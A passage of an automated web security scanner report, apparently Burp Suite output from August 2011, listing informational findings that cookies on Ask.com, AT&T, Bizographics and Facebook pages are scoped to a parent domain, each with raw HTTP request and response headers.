Path:   /staticcontent/about/helpcenter/about_helpcenter_helpcenter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/helpcenter/about_helpcenter_helpcenter HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1301
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnSQpcQDcAAAZVDvMAAAAj
from-tr: trafrt007iad.io.askjeeves.info
Cache-Control: private
APP_REQUEST_ID: TklnSQpcQHUAAB19IDIAAAAU
tsid: 0a5c4075
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:57 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:57 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Help Center</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;

...[SNIP]...

12.57. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/helpcenter/about_helpcenter_webmaster

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/helpcenter/about_helpcenter_webmaster HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help/webmasters
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Content-Length: 18494
tr-request-id: TklnUApcQDcAAAZVEpMAAAAZ
from-tr: trafrt007iad.io.askjeeves.info
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:04 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:04 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>For Webmasters</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;

...[SNIP]...

12.58. http://www.ask.com/staticcontent/about/legal/about_legal_notices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/legal/about_legal_notices

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/legal/about_legal_notices HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQXIAABTil6UAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 14604
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:55 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask Site Policies</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;
...[SNIP]...

12.59. http://www.ask.com/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...

12.60. http://www.att.com/homepage/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /homepage/sitemap/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/sitemap/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3PSFsXYqAYUFKqOK_sPf9_3Wh086Y6DglpYWp7s-vVMKvcJOAElUyNA
Host: www.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jul 2011 18:26:18 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32874
Date: Mon, 15 Aug 2011 18:22:55 GMT
Connection: close
Set-Cookie: TLTHID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com
Set-Cookie: TLTSID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com
Set-Cookie: TLTUID=9830CC32C76B10C7194C8FA0E36BD744; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:22:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AT&amp;T Site Map
...[SNIP]...

12.61. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&pid=311 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQyjZ9vEOuR1aj5XcunNcMDa7Re6IGD4lIipxjZk1PBFcAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQiizxJ8nJqAy5GqegFtDb4MEVUJBxdqAyBJTxbAIk5qLhervg1jpjQxsnfYkVZOU3MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Mon, 15 Aug 2011 18:45:37 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; Domain=.bizographics.com; Expires=Tue, 14-Feb-2012 06:45:37 GMT; Path=/
Set-Cookie: BizoData=0puDrjUMbKuQy8yP8wQLotQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KazJxz1QQNA2aj5XcunNcMDa7Re6IGD4lH3gMwHCiiisgKAd6xyMUDLG6cRlBGUwzMkGgFZ2wiiZYO4JdcPjwyxF4uCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv7sjLwADd9GswxDbkrdiiisxdJRFsRyXovJiibVtisJNCGohWr1XIQIIGVeDMWB2gjMIisBiitkUr3XlA9M6dE4BpAgrjIo8HSHKMOwhbCzvtRQHWl50vbcvMQEdM8EL3R4f4J5Ufxc35xQDd0MCjXXNxvZEIn9yt55w3TOIwQ0TyFv2zEisHAZjjknyoEvNgUnOhTVe; Domain=.bizographics.com; Expires=Tue, 14-Feb-2012 06:45:37 GMT; Path=/
Content-Length: 0
Connection: keep-alive


12.62. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ConanTheBarbarian?sk=photos HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=app_108503912579284
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954; act=1313433582687%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433582688%2C%22act%22%2C1313433582687%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos%22%2C%22click%22%2C%22click%22%2C%22fbx_navigation%22%2C%22r%22%2C%22%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C80%2C824%2C49%2C1008%2C16%5D; x-src=%2FConanTheBarbarian%7Cpagelet_fbx_navigation

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.239.39
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:47 GMT
Content-Length: 119745

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

12.63. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php? HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=yxUAz; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.52.34
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:15 GMT
Content-Length: 0


12.64. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php? HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.173.33
X-Cnection: close
Date: Mon, 15 Aug 2011 18:48:17 GMT
Content-Length: 0


12.65. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p; lsd=yxUAz; next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; next_path=%2Fhome.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=pG8pTrLcOF5vWXJLyEMRGq7p; expires=Wed, 14-Aug-2013 18:26:50 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.228.27
X-Cnection: close
Date: Mon, 15 Aug 2011 18:26:50 GMT
Content-Length: 17097

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="27lC";</script><noscript
...[SNIP]...

12.66. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
